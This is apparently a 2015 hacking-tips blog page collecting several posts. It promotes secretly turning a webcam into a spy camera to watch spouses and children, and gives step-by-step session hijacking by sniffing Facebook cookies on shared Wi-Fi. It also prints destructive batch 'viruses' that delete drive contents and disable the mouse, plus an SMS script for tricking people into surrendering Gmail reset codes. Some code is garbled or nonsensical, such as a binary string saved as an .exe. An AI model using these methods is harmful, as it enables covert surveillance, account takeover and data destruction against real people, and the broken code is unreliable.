Tuesday, December 29, 2015

Turn Your Webcam into a Spy Cam for Free

You can now easily monitor your room, office or workplace for activities going on during your absence without having to invest on expensive hidden cameras. If you’ve ever wondered to find a way to turn your PC webcam into a spy camera, here is a simple and effective solution. This can be really handy to monitor your children and pets in home or even catch a cheating spouse red handed! For this, all you need is a computer with an Internet connection and a webcam attached to it.
If your computer meets the above simple requirements, then you are all set to go. The site called ugolog.comprovides a free solution to simply transform your webcam into a powerful spy camera in just a few steps. You can sign-up for a free account and start using the service immediately.
Since UGOlog service runs as a web application from within the browser, there is no need to install any additional software on your computer. That means, when your spouse or children look through the installed programs, they don’t find anything that arouses suspicion.

What to Do if Your Computer Gets Hacked?

As the news of several accountants’ computers being hacked by criminal gangs, the security of your computer on Internet is again under scanner. As the use of Internet is increasing, the chances of your computer getting hacked are also increasing dramatically. There is plenty of file sharing and web surfing that is being done, which makes your computer vulnerable for attack. But this article will help you in deciding what steps to take if your computer gets hacked.

How to Find if Your Computer is Hacked?

It is important to know when your computer has been actually hacked and when it is just behaving weird:
  • Sometimes it’s just simple and the hacker may leave some note or warning to prove that your computer is actually hacked.
  • You are not able to access your various mails and social media accounts or at worst you are not able to access your computer.

Steps to Take if Your Computer Gets Hacked:

1. Check the Impact of Damage

After using your computer for some time you would know what type of infection you are facing whether it’s malware, virus, trojan, keylogger (spyware) or anything else. In case a keylogger application is installed, you can use a good antispyware program to remove the infection. However, formatting the hard drive is a better option if the infection is severe. You should try to back-up all the important and confidential files that you may have in your computer before formatting.

2. Damage Control

You should run antivirus programs to determine the extent of damage. Users of Windows OS can run “Malware bytes” which can be found freely and recognises various harmful applications which antivirus cannot. Sophos Mac antivirus is a free application which can be used by Mac users.

3. Removal

After running several scans you will know what is the extent of damage you are facing. After making the list of viruses and malware that have infected your computer, next thing you need to find is what the impact of damage is. For that you must check the details about those viruses and malware programs to know how they rank in terms of damages they can have in your computer. You must carry out the searches from a neutral device which is not hacked and search for removal tools for those malware programs which have infected your computer. Unfortunately, if after several tries you are not able to clean your computer then the only option left is to re-install your operating system.

4. Offline Hacking

This is true that Internet is the most common way to hack a computer, but it is possible that anybody can hack your system using USB devices. The process of removal of the infection is the same in this case as well. The best precaution you can take to avoid such situations is to password protect your computer OS and BIOS. This makes it difficult for anyone to gain access to your computer.

Conclusion:

The best thing that you can do is to protect your computer by using fully updated antivirus and a good firewall. It is also wise to have a protection tool for windows registry. To protect your files, you can use encryption tools so as to encrypt the data on your hard disk. As there is no 100% foolproof way to prevent hacking it is always better to take precautionary measures.

Make WhatsApp Free For Lifetime only for Android

Make WhatsApp Free For Lifetime only for Android !

1: Uninstall whatsapp,if your trial version is finished, or you want
to extend it for a year.

2: Go to gmail application and
create a new gmail id.

3: Once you have made it,wait for some time (it totally depends on
your connection speed,ideally you
should wait for 15-20 minutes)
4: Go to google play, click on the menu button of your android and choose “Account Settings”.
5: Once you have done this,you just need to choose the new gmail
account, you just created, and download whatsapp once again.
6: Now open whatsapp, and sign into your whatsapp account…
Step 7-Enjoy!!
Note:- This way you will make it free for one year,to make it free for
lifetime, you will have to apply this trick once every year.

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

this works At
LAN(local Area Network) . its best place to hack at university, cafe , public place where computer
are on one LAN simple Example WI-Fi.

What is Cookies And how the use of stealing
cookies?
Cookies are file’s that stored on Any computer’s By any website when a you visits them . the
cookie used by the web server to check the
authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file .
both are matched when you open a Account.
so then finally we will start.
Step 1:
Download the Wire Shark and install it.
Step 2:
Next open the wire shark and then click on
interface.
Step 3:
Next choose a interface which is received and
sending packet and click on start
Step 4:
Continue the sniffing for around like 10 minutes.
Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.
Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.
Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only
Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]2. Grease Monkey[add-on]3. Cookie injector[code]and then open facebook. com make sure you are
not login
Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.
Step 10
Now refresh your page so then finally you Enter
the Victim Account.

Download whatsApp for Windows

To use the Android version of WhatsApp, either you need an Android phone or a well running Android emulator or SDK. There are so many emulators around, but I find BlueStacks App
Player a real treat. It is now available for free and one can install
the same on Windows PC, Laptops or Mac OS as well. It is a very smooth
emulator with full screen ability. You can install and run Android apps
from Google Play Store by signing up with existing Google Account.
YouWave is another
emulator for running Android applications on PC.

How to Make a Computer Virus

Virus that format C: Drive:

 1. Open Notepad and copy below code into it.

@Echo off
Del C: *.* |y
   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.
 

>>>Virus that Disable Mouse:

  • Open Notepad and copy below codes
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
  • Save this file as  virus.bat
  • Done you just created your virus.

>>>Virus that create binary virus to format HARDDIsK:

   1. Copy the below codes intoNotepad.

01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

 

Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

This Simple Trick Requires Only Your Phone Number to Hack your Email Account !!

In order to get into your email account, an attacker does not need any coding or technical skills. All an attacker needs your email address in question and your cell phone number.

Here's How the Scam Works:


Send a text from an unknown number to the victim’s phone, asking them to verify their account by replying with the verification code they are about to receive in order to ensure their Google account is secure, but in real the code is a password resets code.
  • Send another text message containing an unlock code to the registered phone.
  • The victim receives the code with a text something like this: "This is Google. There has been unauthorized activity on your account. Please reply with your verification code.
  • As soon as victim responds with the verification code, the email address is forfeited, and the attacker can log into victim’s Gmail account without detection.
  • This social engineering trick sounds so easy and requires almost no technical skills to get into anyone’s email account.

    Most of us reply to the unknown phone calls and messages thinking it is from the company, as receiving messages and phone calls from companies is not something uncommon.